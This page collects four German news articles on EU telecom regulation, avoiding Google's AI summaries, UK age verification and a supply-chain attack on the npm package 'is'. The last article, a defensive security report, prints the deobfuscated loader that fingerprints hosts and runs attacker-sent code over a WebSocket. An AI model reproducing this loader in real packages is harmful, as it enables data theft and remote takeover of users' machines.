Connect with us

Datenschutz & Sicherheit

Dieses Internet der Zukunft wünschen sich die mächtigen Telekom-Konzerne


Mit dem geplanten Digital Networks Act (DNA) hat sich die EU-Kommission viel vorgenommen: Das für Ende des Jahres angekündigte Gesetz soll den Ausbau moderner Infrastruktur beschleunigen, den Bürokratieaufwand für Netzbetreiber senken und womöglich einen gemeinsamen europäischen Markt für Telekommunikation schaffen.

Wie die EU diese ambitionierten Ziele im Detail erreichen will, ist noch nicht geklärt. Zumindest die grobe Richtung hat die Kommission aber schon vorgegeben: In von der EU in Auftrag gegebenen Berichten warben ehemalige europäische Spitzenpolitiker wie Enrico Letta oder Mario Draghi für Deregulierung, Konsolidierung und generell mehr Markt. Auch ein ähnlich gelagertes, vom inzwischen aus der Kommission ausgeschiedenen Thierry Breton auf den Weg gebrachtes Weißbuch soll ausdrücklich als Inspiration für den DNA herhalten.

EU-Kommission könnte Paradigmenwechsel anstoßen

Über den Sommer hat die Kommission eine Konsultation durchgeführt und die Öffentlichkeit um ihre Meinung zu den bislang nur grob skizzierten Vorschlägen gebeten. Zur Debatte hat sie dabei einige Eckpfeiler bisheriger Regulierungspolitik gestellt: So etwa die Regeln für die Netzneutralität und die bislang national durchgeführte Vergabe von Mobilfunkfrequenzen. Auch die die Verpflichtung für große Ex-Monopolisten wie die Telekom, zu geregelten Bedingungen Wettbewerber in ihre Netze zu lassen, steht auf dem Prüfstand.

Zugleich richtet die EU-Kommission den Blick in die Zukunft. Nicht ganz so blumig wie Bretons Weißbuch sieht sie dennoch ein weiteres Zusammenwachsen von Netzen und darauf laufender Anwendungen vor sich, sodass ein eng verknüpftes „Konnektivitätsökosystem“ aus Leitungen, Rechenzentren und beispielsweise KI-Chatbots oder smarten Toastern entsteht. Dass dies auf sogenannte vertikale Integration hinausläuft, bei der letztlich vieles aus der Hand eines einzigen Unternehmens kommt, streitet die Kommission zwar als Zielvorgabe ab, wünscht sich aber zumindest eine erleichterte Zusammenarbeit zwischen den jeweiligen Akteuren.

Kurzum: Es gibt kaum ein Eck des Internet-Ökosystems, das nicht potenziell vom DNA angetastet wird. Entsprechend vielfältig war die Beteiligung an der EU-Konsultation, darunter große wie kleine Netzbetreiber, Verbraucherschutzorganisationen, Inhalteanbieter oder Hardwarehersteller. In einem ersten Schritt haben wir uns die verfügbaren Stellungnahmen der großen Ex-Monopolisten aus Deutschland (Telekom Deutschland), Spanien (Telefónica) und Frankreich (Orange) angesehen und ausgewertet. Gleich vorweg: Ihre Sicht ist in weiten Teilen deckungsgleich.

Es geht um handfeste Interessen auf einem milliardenschweren Markt: Dem Branchenverband Bitkom zufolge wurden in diesem allein in Deutschland 2024 insgesamt fast 226 Milliarden Euro umgesetzt. Auf der anderen Seite steht der Investitionsbedarf, der laut Kommission notwendig ist, nur um die selbst gesteckten Ausbauziele zu erreichen. Mindestens 150 Milliarden Euro seien EU-weit erforderlich, um eine flächendeckende Versorgung mit Glasfaser und 5G-Mobilfunk bis zum Ende des Jahrzehnts zu schaffen.

Schielen auf den Aktienmarkt

Mit ihren Deregulierungsfantasien läuft die EU-Kommission bei ehemaligen und bislang stark regulierten Monopolisten naturgemäß offene Türen ein. Seit ihrer (Teil-) Privatisierung hat die sogenannte Vorab-Regulierung ihre Marktmacht zwar gedämpft, große und inzwischen börsennotierte Unternehmen mit ganz eigenen Bedürfnissen sind sie aber dennoch geblieben.

Das lässt sich nicht zuletzt an ihrer Prioritätensetzung ablesen. Die unterscheidet sich merklich von kleineren Betreibern: So lenkt die Telekom Deutschland in ihrer Stellungnahme zum DNA den Blick zunächst auf die Aktien- und Kapitalmärkte. Trotz steigender Nachfrage nach ihren Produkten, eingebettet in eine insgesamt wachsende EU-Wirtschaft, habe sich die Marktkapitalisierung der fünf größten europäischen Netzbetreiber seit 2016 mehr als halbiert, genauso wie die Kapitalrendite gefallen sei.

Damit blieben die Erträge unter den Erwartungen der Investor:innen, die laut Telekom „weitgehend“ das Vertrauen in die Branche verloren hätten. Problematisch sei zudem, dass Netzbetreiber in der EU im Verhältnis zum Umsatz mehr als Betreiber in vergleichbaren Industrienationen investieren würden, während etwa in den USA doppelt so viel pro Kopf fließen würde. Zusammen mit wachsenden Schulden schränke das ihre Möglichkeiten ein, sich frisches Kapital zu besorgen, das sie für „Innovation und Investment“ brauche, warnt die Telekom.

Große Betreiber wollen Vorab-Regulierung beenden

Neben diesem Schlüsselargument wirbt die Telekom, gemeinsam mit Telefónica und Orange, erwartbar für die Abschaffung der Vorab-Regulierung. Stattdessen soll normales Wettbewerbsrecht, das nur nachträglich auf Fehlentwicklungen reagieren kann, zum Standard-Regulierungsansatz werden, begleitet vom im Vorjahr verabschiedeten Gigabit Infrastructure Act. Zudem sollten möglichst viele sektorspezifische Regeln fallen, etwa durch harmonisierte, horizontale Vorschriften für Verbraucherschutz, die obendrein von EU-Ländern nicht verschärft werden dürften.

Umgekehrt brauche es jedoch kein harmonisiertes EU-Zugangsprodukt, so die Konzerne. Damit sind Spezifikationen gemeint, mit denen sich Wettbewerber in die Infrastruktur der regulierten Ex-Monopolisten einklinken können. Für Universaldienstverpflichtungen sehen sie keinen Platz mehr, sie sollten komplett entfallen. Darüber hinaus drängen Telefónica und Orange darauf, die ePrivacy-Richtlinie ebenfalls ersatzlos zu streichen. In unterschiedlicher Intensität werben die Betreiber zudem dafür, die Roaming-Regeln zu lockern.

Während es die Telekom beim Wunsch nach drastisch reduzierten Transparenz- und Berichtspflichten in dem Bereich belässt, sieht Telefónica keinen Anlass mehr für regulierte Roaming-Preise und für Anrufe innerhalb der EU. So hätte der Markt dieses Problem gelöst, außerdem gebe es ja sogenannte OTTs (Over-The-Top-Anbieter), mit denen sich kostenlos kommunizieren lasse, schreibt Telefónica. Freilich hat nicht der Markt, sondern erst EU-Regulierung das Problem der horrend hohen Gebühren für EU-Auslandstelefonie beseitigt.

Netzneutralität aufschnüren

Genau von diesen OTTs wollen Telko-Riesen jedoch Geld und drängen in diesem Punkt dann doch auf mehr Regulierung: Sie wollen garantierte Entgelte von Inhalteanbietern, die ihre Leitungen zu Endkunden nutzen. Dabei treibt die Telekom laut ihrer Stellungnahme die Angst vor dem Ende des offenen Internets um: Große Inhalteanbieter würde mittlerweile den Löwenanteil des Datenverkehrs verursachen, „was einen signifikanten Wandel von einem offenen, dezentralen und nutzerzentrierten Internet zu einem hochkonzentrierten Content-Delivery-Netzwerk für große kommerzielle Inhalteanbieter markiert“, schreibt sie.


2025-07-14
415.12
39


– für digitale Freiheitsrechte!



Euro für digitale Freiheitsrechte!

 

Außerdem würden für traditionelle Telekommunikationsanbieter spezifische Auflagen gelten, an die sich die neuen Platzhirsche wie WhatsApp nicht halten müssten, so die Telekom – etwa die EU-Regeln zur Netzneutralität. Zur Erinnerung: Die wurden ursprünglich auch deshalb in die Welt gesetzt, damit Netzbetreiber mit beispielsweise Aufpreisen für Skype-Telefonie oder Messenger- und SMS-Nachrichten neuen Internetdiensten nicht Steine in den Weg legen und Innovation verhindern können.

Da solche OTTs inzwischen auf den gleichen Märkten aktiv seien, wäre der bisherige Ansatz unfair und müsse beendet werden: „Diese regulatorische Asymmetrie sollte angegangen werden“, fordert die Telekom. Ähnlich argumentiert das französische Unternehmen Orange, das sogar Hersteller von Betriebssystemen in die Pflicht nehmen will. Schließlich hätten auch sie „Auswirkungen auf die Servicequalität und das Benutzererlebnis“, heißt es in der Stellungnahme.

Aufgewärmte „Fair Share“-Debatte

Mindestens brauche es einen neuen Mechanismus, mit dem sich Auseinandersetzungen rund um Zusammenschaltungsentgelte zwischen Netzbetreibern und Inhalteanbietern „effizient“ beilegen lassen sollen. Dieser soll nach dem Wunsch der Konzerne bei einer ungenannt gebliebenen Behörde angesiedelt werden – offenbar an Gerichten vorbei, die solche bisher seltenen Streitigkeiten aufgelöst haben. Damit wärmen die Großbetreiber die sogenannte „Fair Share“-Debatte wieder auf, die eigentlich vor Jahren unrühmlich in der Versenkung verschwunden war.

An der Netzneutralität knabbern wollen große Netzbetreiber auch an anderer Stelle. Die im 5G-Mobilfunkprotokoll eingebauten „Network Slices“ sollen von ihnen lang ersehnte, bezahlte Überholspuren endlich möglich machen. Mit der Slicing-Technik lässt sich das Internet in voneinander abgeschirmte Scheiben mit unterschiedlichen Qualitätsparametern schneiden und vermarkten. Im schlimmsten Fall wäre dies ein Todesstoß für die Netzneutralität.

Möglich sind solche „Spezialdienste“ heute schon, aber unter Auflagen: Sie müssen objektiv notwendig sein, dürfen normale Zugangsprodukte nicht ersetzen und können nicht zu Lasten des offenen Internets gehen. Dies sei nicht mehr zeitgemäß, behaupten die drei Betreiber. Mindestens müsse es klare Vorgaben für erlaubte Spezialdienste geben, die über die heute geltenden und durchaus detaillierten Regeln hinausgehen, fordern sie.

Den Mobilfunkbereich wollen die drei Betreiber ohnehin möglichst nur für sich selbst reklamieren. So sollten die Nutzungsrechte für Frequenzen drastisch verlängert werden, in den Raum stellen sie 40 Jahre bis unendlich lange. Zudem wollen sie über den umkämpften oberen 6-Gigahertz-Bereich alleine verfügen, anstatt ihn mit WLAN zu teilen.

Alles in allem lesen sich die Wünsche der großen drei Ex-Monopolisten wie ein Programm, das sie wieder zu alter Größe und nahezu monopolistischer Macht führen soll – nur diesmal in privater und nicht mehr staatlicher Hand. Ganz anders sehen das kleinere Anbieter, über deren Einreichungen zur Konsultation wir im nächsten Artikel berichten werden.



Source link

Weiterlesen
Kommentar schreiben

Leave a Reply

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Datenschutz & Sicherheit

Googles „Übersicht mit KI“ abstellen, so gehts


Seit März 2025 ist die sogenannte „Übersicht mit KI“ auch in Deutschland vollständig in der Google-Suche integriert. Google bietet direkt unter der Suchleiste eine per Sprachmodell generierte Zusammenfassung der Suchergebnisse an, „um schneller und einfacher“ zu Suchergebnissen zu kommen, so Google selbst.

Jedoch sind die Antworten der KI-Übersicht nicht verlässlich: Die Google-KI kann „unrichtige oder anstößige Informationen liefern. Bei Übersichten mit KI können und werden Fehler vorkommen“, wie der Konzern erklärt. Die „Übersicht mit KI“ sei eine Kernfunktion der Google-Suche und ließe sich deswegen nicht direkt deaktivieren.

Es gibt aber aktuelle Möglichkeiten, die KI-Übersicht dauerhaft zu meiden. Sie können je nach Browser variieren – und ob sie auf Dauer funktionieren, hängt von Google ab. Noch bietet Google selbst eine Ansicht der Suchergebnisse ohne KI, allerdings ein wenig versteckt: Bereits im Mai 2024 führte Google hierfür einen neuen Reiter mit dem Namen „Web“ ein, zusätzlich zu  den Reitern „Bilder“, „Videos“ und „News“. Manchmal befindet sich dieser Reiter hinter dem Aufklapp-Menü „Mehr“ am Ende der Auflistung.

Nach dem Googeln auf diesen Reiter zu klicken ist eine Möglichkeit, die KI-Übersicht zu meiden. Wer sich jedoch das dauerhafte Klicken sparen möchte, kann sich zumindest in manchen Browsern direkt diesen Web-Reiter anzeigen lassen. Das heißt, man bekommt nach einer Suchanfrage sofort die Ergebnisse ohne KI-Zusammenfassung serviert.

Benutzerdefinierte Suchmaschine anlegen

Bildschirmfoto von Firefox zeigt den im Text beschriebenen Weg
So kann es bei Firefox aussehen. – Alle Rechte vorbehalten Screenshot: Firefox

Um Googles KI-Zusammenfassung zu umgehen, lässt sich in den Browser-Einstellungen bei Firefox und Chrome eine benutzerdefinierte URL für Suchmaschinen festlegen.

Bei Chrome funktioniert die Umstellung in sieben Schritten:


2025-07-14
415.12
39


– für digitale Freiheitsrechte!



Euro für digitale Freiheitsrechte!

 

  • Mit einem Klick auf das Drei-Punkte-Symbol in der Browser-Leiste öffnen sich die Browser-Einstellungen.
  • In der Spalte links öffnet ein Klick auf den Menüpunkt „Suchmaschinen“ die Suchmaschinen-Einstellungen.
  • Dort auf „Suchmaschinen und die Websitesuche verwalten“ klicken.
  • Unter „Websitesuche“ lässt sich ein neuer Eintrag mit dem Button „Hinzufügen“ anlegen.
  • Es öffnet sich ein kleines Fenster mit mehreren Eingabemöglichkeiten: „Name“ und „Kürzel“ können frei gewählt werden. Wichtig ist nur unter „URL“ folgendes Eingabe: {google:baseURL}/search?udm=14&q=%s
  • Mit Klick auf den Button „Hinzufügen“ wird dieser neue Eintrag gespeichert.
  • In der Auflistung der Suchmaschinen, direkt hinter dem neuen Eintrag, muss im Drei-Punkte-Menü noch die Option „Als Standard festlegen“ angeklickt werden.

Diese Änderung lässt sich auch schnell wieder rückgängig machen, indem man Google wieder als Standardsuchmaschine festlegt.

Bei Firefox funktioniert die Umstellung ähnlich einfach:

  • Ein Klick aufs Burger-Symbol in der Browserleiste öffnet die Einstellungen.
  • In der Spalte links öffnet ein Klick auf den Menüpunkt „Suche“ die Suchmaschinen-Einstellungen.
  • Unten auf der Seite bei „Suchmaschinen-Schlüsselwörter“ legt ein Klick auf „Hinzufügen“ einen neuen Eintrag an.
  • Es öffnet sich ein kleines Fenster mit mehreren Eingabemöglichkeiten: „Name der Suchmaschine“ und „Schlüsselwort“ sind frei wählbar. Wichtig ist, unter „URL mit %s anstelle des Suchbegriffs“ Folgendes einzugeben:
  • Mit Klick auf „Suchmaschine hinzufügen“ wird dieser neue Eintrag gespeichert.
  • Oben auf der Seite unter „Standardsuchmaschine“ lässt sich im Drop-Down-Menü die neu angelegte Suchmaschine als Standard-Suchmaschine festlegen.

In diesem Drop-Down-Menü kann man die Standardsuchmaschine auf Wunsch auch wieder ändern.

Bei Safari ist es nicht möglich, benutzerdefinierte Suchmaschinen anzulegen, ohne weitere Apps oder Add-ons zu installieren.

„Übersicht mit KI“ verändert Browsing-Verhalten

Kürzlich veröffentlichte das US-Meinungsforschungsinstitut Pew Research Center eine Studie zum Online-Suchverhalten von 900 Teilnehmer*innen. Dabei fanden die Wissenschaftler*innen heraus, dass die „Übersicht mit KI“ deutliche Auswirkungen hat. Erscheint bei einer Suche mit Google eine KI-Zusammenfassung, ist demnach die Wahrscheinlichkeit geringer, dass Suchende noch auf Links zu weiterführenden Webseiten klicken. Außerdem würden Google-Nutzende öfter ihre Browsing-Session beenden, nachdem eine KI-Zusammenfassung auftaucht. Auch andere Studien bestätigen diesen Effekt. Viele sehen in dieser Entwicklung deshalb eine Bedrohung für werbefinanzierte Webseiten, da Aufrufzahlen und somit Einnahmen sinken.

Eine andere Möglichkeit, die „Übersicht mit KI“ zu umgehen, ist die Suchmaschine zu wechseln. In der alternativen Suchmaschine „DuckDuckGo“ gibt es zwar auch eine KI-Zusammenfassung; sie lässt sich jedoch direkt in den Einstellungen der Suchmaschine ausstellen. Außerdem legt der US-Anbieter größeren Wert auf Privatsphäre der Nutzenden. In den Datenschutzbestimmungen von DuckDuckGo heißt es: „Wir speichern und teilen Ihre Such- und Browserverläufe nicht“. Hier berichten wir ausführlicher über alternative Suchmaschinen.



Source link

Weiterlesen

Datenschutz & Sicherheit

Pornhub beugt sich britischen Alterskontrollen


Ab heute, dem 25. Juli, müssen Plattformen mit potenziell für Kinder schädlichen Inhalten das Alter britischer Nutzer*innen kontrollieren. Die Grundlage dafür ist der Online Safety Act, durchgesetzt von der dortigen Medienaufsicht Ofcom.

Pornhub-Mutterkonzern Aylo, eines der weltgrößten Porno-Unternehmen, zieht mit und betont in feinster PR-Prosa, sich schon seit Jahren für das Thema eingesetzt zu haben. Andernorts, in Deutschland und Frankreich etwa, wehrt sich Pornhub erbittert gegen ähnliche Vorstöße vor Gericht. Denn auch in der EU drängen Politik und Behörden auf rigorose Altersschranken.

Großbritannien geht hier mit schlechtem Beispiel voran. Der Blick zum ehemaligen EU-Land lohnt sich, um zu sehen, wie man es nicht machen sollte.

Zu den in Großbritannien amtlich empfohlenen Methoden der Alterskontrolle gehören etwa der Upload von Ausweisdokumenten oder biometrische Gesichtsscans. Auch über Banken oder mithilfe von Kreditkarten können Nutzer*innen ihr Alter nachweisen. Betroffen sind nicht nur Pornoseiten, sondern ebenso andere Plattformen mit potenziell nicht jugendfreien Inhalten, darunter Reddit, Discord, Bluesky oder Grindr.

Behörde warnt vor Hürden, die sie selbst errichtet hat

Die von der Ofcom empfohlenen Methoden zur Alterskontrolle, die auf Dokumenten basieren, schließen nicht nur Menschen ohne Papiere aus – sie sind auch eine Gefahr für Datenschutz und Privatsphäre. Nicht minder bedenklich sind biometrische Gesichtsscans, denn Biometrie ist ähnlich invasiv.

Mithilfe von biometrischen Gesichtersuchmaschinen wie Clearview AI oder PimEyes lassen sich Menschen allein anhand ihres Gesichts identifizieren. Hinzu kommt potenzielle Diskriminierung: KI-basierte Systeme, die das Alter anhand des Gesichts abschätzen, machen Fehler, insbesondere bei Personen aus Gruppen, die in den Trainingsdaten unterrepräsentiert sind.

Es mutet zynisch an, wenn die britische Medienaufsicht selbst auf einer Infoseite schreibt:

Sie sollten bei der Weitergabe persönlicher Informationen ein gewisses Maß an Vorsicht und Urteilsvermögen walten lassen.

Die Behörde warnt also vor den Hürden, die sie selbst errichtet hat. Aus gutem Grund pocht die EU-Kommission in ihren Leitlinien zu Alterskontrollen auf Datensparsamkeit und Anonymität. Wobei nach wie vor zweifelhaft ist, ob sich die EU auch an ihre eigenen Maßstäbe halten wird.

Kontrollen lassen sich kinderleicht umgehen

Bei aller Kritik am „Wie“ von Alterskontrollen kann die Frage nach dem „Ob“ schnell in Vergessenheit geraten. Denn Fachleute für Medienpädagogik und für digitale Grundrechte hinterfragen, dass solche strengen Altersschranken überhaupt eingesetzt werden – auch im Interesse der Jugendlichen selbst. Der Grund: Minderjährige brauchen gute Infoangebote statt Verbote; sie brauchen vertrauensvolle Ansprechpersonen statt Ausweiskontrollen. Die leicht umgehbaren Kontrollsysteme bieten nur eine trügerische Sicherheit.

Die offenkundige Ignoranz gegenüber solchen Einwänden legt den Verdacht nahe, dass bei der beharrlich betriebenen Alterskontroll-Politik andere Motive eine Rolle spielen. So könnte es bei manchen Wähler*innen einen Eindruck von Durchsetzungskraft und Stärke hinterlassen, wenn Politik und Behörden Tech-Konzerne zum Einlenken bringen. Zudem dürfte ein Internet mit mehr Kontrollen und Datenspuren, mit weniger Anonymität und Freiheiten all jenen gefallen, die seit Jahrzehnten Überwachungsfantasien hegen.

Überwachungsfantasie ist das Stichwort für die Gefahr hinter der britischen Symbolpolitik. Stand aktuell werden die hart erkämpften Alterskontrollen keinen einzigen britischen Jugendlichen von Pornos fernhalten. Mit simplen Mitteln wie VPN-Software oder dem Tor-Browser lassen sich die Kontrollen kinderleicht umgehen. Sie verfehlen ihren angeblichen Zweck.

Die BBC zitiert einen britischen Nutzer, der ironisch von einer „schweren“ Entscheidung spricht: „Na klar gebe ich meine sensiblen Daten einfach irgendeinem unbekannten, nicht überprüften Unternehmen – oder… ich benutze eben ein VPN.“ Der Nutzer steht damit stellvertretend für viele andere. Auch in US-Bundesstaaten ging die VPN-Nutzung durch die Decke, nachdem deren Regierungen Pornoseiten zur Einführung von Alterskontrollen gedrängt hatten.

Medienaufsicht will Infos über VPNs einschränken

Wenig sinnvolle Alterskontrollen, die sich auch noch leicht umgehen lassen: Die Geschichte der britischen Alterskontrollen könnte eine Komödie sein, wenn sie an dieser Stelle enden würde. Das tut sie aber nicht.


2025-07-14
415.12
39


– für digitale Freiheitsrechte!



Euro für digitale Freiheitsrechte!

 

Die Einführung der Alterskontrollen könnten sich nämlich nur als der erste Akt einer Tragödie erweisen, um Stück für Stück Anonymisierungs-Dienste wie VPN-Software oder Tor zu kriminalisieren. Solche Dienste gehören in den Werkzeugkasten digitaler Selbstverteidigung, um Grundrechte wie Datenschutz, Privatsphäre oder Informationsfreiheit zu wahren und Zensur zu umgehen. Wer ein VPN nutzt, verschleiert gegenüber dem eigenen Internet-Zugangsanbieter und dem Website-Betreiber die tatsächliche Herkunft; vertraut diese Informationen jedoch dem VPN-Anbieter an.

Der britischen Medienaufsicht sind VPN-Dienste jetzt schon ein Dorn im Auge, wie aus einer Leitlinie für Betreiber von Pornoseiten hervorgeht. Demnach sollen die betroffenen Seiten keine Inhalte zulassen, die Minderjährige dazu anleiten oder ermutigen, Zugangskontrollen zu umgehen. Verboten sind demnach „Informationen über oder Links zu einem Virtual Private Network (VPN)“.

Weg in eine düstere Zukunft

Solche Formulierungen erinnern auf beklemmende Weise an Gesetze aus autoritären Staaten, die den Zugang zur Informationen und damit die Meinungsfreiheit kontrollieren wollen. Zum Beispiel hat der Iran die Nutzung von VPN-Diensten verboten. Der russische Staat sperrt VPN-Dienste, die nicht mit Behörden kooperieren wollen.

Von den Ofcom-Leitlinien zu einem veritablen VPN-Verbot mag es noch ein langer Weg sein. Zunächst sollen es Pornoseiten ihren britischen Nutzer*innen lediglich nicht unter die Nase reiben, wie man ihre Kontrollen umgeht. Ohne Blick aufs große Ganze könnte man das als schlüssig betrachten. Allerdings ebnet es den Weg für radikalere Vorstöße.

Grassierende Alterskontrollen können also in eine düstere Zukunft führen, in der eines Tages auch in Großbritannien und der EU ernsthaft über die Kriminalisierung von VPN-Diensten diskutiert wird – natürlich nur im Namen des Jugendschutzes. Politiker*innen, die nach einem lückenlos überwachten Internet trachten, könnten mit gespielter Überraschung anprangern, dass die Alterskontrollen ja gar nicht wirksam sind und man da doch etwas unternehmen müsse. Sonst wären die jahrelangen Bemühungen umsonst gewesen; das dürfe man den Kindern nicht antun.

Und plötzlich stehen dann die Grundrechte von allen auf dem Spiel, die sich aus gutem Grund vor kommerzieller und staatlicher Überwachung im Netz schützen müssen, darunter Journalist*innen und Aktivist*innen, Dissident*innen und Oppositionelle, verfolgte Minderheiten, Whistleblower*innen und so weiter.

Währenddessen hilft niemand jungen Menschen, die einfach nur mehr darüber wissen wollen, wie Lust, Sex und Einvernehmlichkeit funktionieren. Dafür bräuchte es nicht etwa Beschäftigung mit Seiten wie Pornhub, sondern unverklemmte, der Entwicklung angemessene Angebote für sexuelle Aufklärung.



Source link

Weiterlesen

Datenschutz & Sicherheit

Beliebtes JavaScript-Paket is: Malware durch Supply-Chain-Angriff


Ein Software-Supply-Chain-Angriff hat das beliebte JavaScript-Paket is getroffen, das es auf knapp 2,7 Millionen Downloads pro Woche bringt.

Der Maintainer Jordan Harband schreibt auf Bluesky, dass Angreifer den Account eines anderen Projektverantwortlichen übernommen hatten. Betroffen sind die Versionen 3.3.1 und 5.0.0 des Pakets.

Empfohlener redaktioneller Inhalt

Mit Ihrer Zustimmung wird hier ein externer Inhalt geladen.

Heads up that v3.3.1 of npmjs.com/is has malware in it, due to another maintainer’s account being hijacked. They’re removed for now, v3.3.0 is set at latest, v3.3.1 is deprecated, and a v3.3.2 will be published once I’m not on my phone (thx @github.com codespaces)

[image or embed]

— Jordan Harband (@jordan.har.band) Jul 19, 2025 at 20:21

Beide Versionen waren offenbar nur wenige Stunden im Umlauf. Inzwischen ist auf der npm-Seite die Version 3.3.2 verfügbar, die keinen Schadcode erhält. Als Übergang hatte Harband die neueren Releases für deprecated erklärt und 3.3.0 als letzte aktive Version markiert, damit Prozesse, die automatisch die jüngste Version eines JavaScript-Pakets von npm anfordern, nicht weiter den Schadcode herunterladen.

Bei is handelt es sich um eine Testing-Library, die unter anderem überprüft, ob ein Wert definiert (is.defined), leer (is.empty) oder von einem bestimmten Typ (generell über is.type(value, type) oder speziell als is.integer, is.bool, is.array etc.) ist.


enterJS Web Security Day

enterJS Web Security Day

(Bild: Alexander Supertramp/Shutterstock.com)

Neun von zehn Webanwendungen haben Sicherheitslücken – höchste Zeit für Web Developer, zu handeln. Auf dem ersten enterJS Web Security Day am 9. Oktober 2025 geht es um automatisierte Sicherheitsprüfungen, den Einsatz von Passkeys und den Schutz vor KI-basierten Angriffen.

Offenbar war dieselbe Angreifergruppe erfolgreich, die mit einer Phishing-Attacke zuvor zahlreiche npm-Maintainer getroffen und bereits die Pakete eslint‑config‑prettier, eslint‑plugin‑prettier, synckit@0.11.9, @pkgr/core, napi‑postinstall und got-fetch mit Schadcode versehen hatte.

Der Angriff auf die anderen Pakete zielte mit einer DLL nur auf Windows. Ein Blogartikel auf Invoke RE beschreibt die in dem Paket eslint‑config‑prettier gefundene Scavenger-Malware genauer.

Der Malware-Loader im is-Paket schlägt dagegen plattformübergreifend unter Windows, macOS und Linux zu.

Ein Blogbeitrag des Security-Softwareunternehmens Socket beschreibt die Arbeitsweise des verschleierten JavaScript-Codes. Der Loader erstellt die Payload demnach vollständig im Speicher des betroffenen Systems und legt den dekodierten Schadcode mittels new Function() als eigene Funktion an.

Diese Funktion fragt schließlich zahlreiche Details wie den Hostnamen, das Betriebssystem, Details zur CPU und Umgebungsvariablen von process.env ab. Schließlich nutzt sie die Library ws, um eine WebSocket-Verbindung aufzubauen und die Daten zu übertragen.

Das Security-Team von Socket hat den entschleierten Schadcode mit Kommentaren versehen, die die Funktionen beschreiben:


// Expose Node's `require`, even in restricted contexts (e.g., Electron)
get "switch"() { return require; }

// Load system and networking modules dynamically
const os = this["switch"]("os");
const WS = this["switch"]("ws");

// Connect to threat actor-controlled WebSocket endpoint
const sock = new WS("wss://");

// Send host fingerprinting data on connect
sock.onopen = () => sock.send(JSON.stringify({
  host: os.hostname(),
  plat: os.platform(),
  cwd : process.cwd()
}));

// Execute threat actor-supplied code received over the socket
sock.onmessage = ({ data }) => {
  new Function(data)();  // remote code execution
};


Im letzten Abschnitt ist erkennbar, dass der Schadcode mit der WebSocket-Verbindung eine Remote Shell aufbaut: Er führt den empfangenen JavaScript-Code direkt über new Function() aus. Der aufgerufene Code hat dieselben Rechte wie der Host-Prozess, sodass er üblicherweise direkten Zugriff aufs Dateisystem und den Netzwerkverkehr hat.

Wer die Library einbindet, sollte sicherstellen, dass keine der infizierten Varianten auf den Rechner gelangt sind. Es ist zudem davon auszugehen, dass die Angreifergruppe weitere JavaScript-Maintainer im Fokus hatte oder hat.


(rme)



Source link

Weiterlesen

Beliebt